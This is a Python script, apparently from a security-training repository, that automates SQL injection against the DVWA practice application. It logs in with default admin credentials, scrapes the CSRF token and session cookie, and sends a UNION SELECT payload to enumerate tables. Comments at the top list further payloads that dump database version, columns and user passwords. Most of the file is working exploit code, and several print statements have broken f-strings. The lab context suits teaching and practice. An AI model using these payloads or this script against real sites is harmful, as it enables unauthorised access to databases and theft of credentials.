1+ #!/usr/bin/python3
2+
3+ #' UNION SELECT version(), NULL#
4+ #' UNION SELECT database(), NULL#
5+ #' UNION SELECT NULL, table_name FROM information_schema.tables#
6+ #' UNION SELECT NULL, column_name FROM information_schema.columns WHERE table_name = 'users'#
7+
8+ #' UNION SELECT user, password FROM users#
9+
10+ import requests
11+ import sys
12+ import urllib3
13+ from bs4 import BeautifulSoup
14+ import re
15+
16+ urllib3 .disable_warnings (urllib3 .exceptions .InsecureRequestWarning )
17+
18+ class Interface ():
19+ def __init__ (self ):
20+ self .red = '\033 [91m'
21+ self .green = '\033 [92m'
22+ self .white = '\033 [37m'
23+ self .yellow = '\033 [93m'
24+ self .bold = '\033 [1m'
25+ self .end = '\033 [0m'
26+
27+ def header (self ):
28+ print ('\n >> DVWA SQL Injection - sqli determines table name' )
29+ print (' >> by twseptian\n ' )
30+
31+ def info (self , message ):
32+ print (f"[{ self .white } { self .end } { message } )
33+
34+ def warning (self , message ):
35+ print (f"[{ self .yellow } { self .end } { message } )
36+
37+ def error (self , message ):
38+ print (f"[{ self .red } { self .end } { message } )
39+
40+ def success (self , message ):
41+ print (f"[{ self .green } { self .end } { self .bold } { message } { self .end } )
42+
43+ # Instantiate our interface class
44+ global output
45+ output = Interface ()
46+ output .header ()
47+
48+ # set proxies
49+ proxies = {"http" :"http://127.0.0.1:8080" ,"https" :"http://127.0.0.1:8080" }
50+
51+ def get_csrf_token (s , url ):
52+ path = "/login.php"
53+ r = s .get (url + path , proxies = proxies , allow_redirects = False )
54+ #extract anti-csrf token
55+ soup = BeautifulSoup (r .text , 'html.parser' )
56+ user_token = soup ("input" , {"name" : "user_token" })[0 ]["value" ]
57+ output .info ("Grabbing user token & session id..." )
58+ output .success ("user token: %s" % user_token )
59+ #extract session information
60+ session_id = re .match ("PHPSESSID=(.*?);" , r .headers ["set-cookie" ])
61+ session_id = session_id .group (1 )
62+ output .success ("session id: %s" % session_id )
63+ return user_token , session_id
64+
65+ def login_to_dvwa (s , url ):
66+ global cookies , headers
67+ user_token , session_id = get_csrf_token (s , url )
68+ data = {"username" :"admin" ,"password" :"password" ,"Login" :"Login" ,"user_token" : user_token }
69+ cookies = {"PHPSESSID" : session_id , "security" : "low" }
70+ headers = { 'content-type' : 'application/x-www-form-urlencoded' , 'user-agent' :'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36' }
71+ path = "/login.php"
72+ r = s .post (url + path , data = data , cookies = cookies , headers = headers , verify = False , allow_redirects = False , proxies = proxies )
73+ if r .headers ["Location" ] == 'index.php' :
74+ return True
75+ else :
76+ return False
77+
78+ def sqli_users_table (s , url ):
79+ start_path = "/vulnerabilities/sqli/?id=1"
80+ sqli_payload = "%27+UNION+SELECT+NULL%2C+table_name+FROM+information_schema.tables%23"
81+ end_path = "&Submit=Submit"
82+ r = requests .get (url + start_path + sqli_payload + end_path , cookies = cookies , headers = headers , proxies = proxies )
83+ soup = BeautifulSoup (r .text , 'html.parser' )
84+ users_table = soup .find (text = re .compile ('(users)' ))
85+ if users_table :
86+ return users_table
87+ else :
88+ return False
89+
90+ if __name__ == "__main__" :
91+ try :
92+ url = sys .argv [1 ].strip ()
93+ except IndexError :
94+ output .info ("Usage: %s <url>" % sys .argv [0 ])
95+ output .info ("Example: %s www.example.com" % sys .argv [0 ])
96+ sys .exit (- 1 )
97+
98+ s = requests .Session ()
99+ if login_to_dvwa (s , url ):
100+ output .success ("Success login to Admin page" )
101+ output .info ("Looking for a users table..." )
102+ users_table = sqli_users_table (s , url )
103+ if users_table :
104+ output .success ("Found the users table name: %s" % users_table )
105+ else :
106+ output .error ("Did not find a users table." )
107+ else :
108+ output .error ("Did not login to Admin page" )
0 commit comments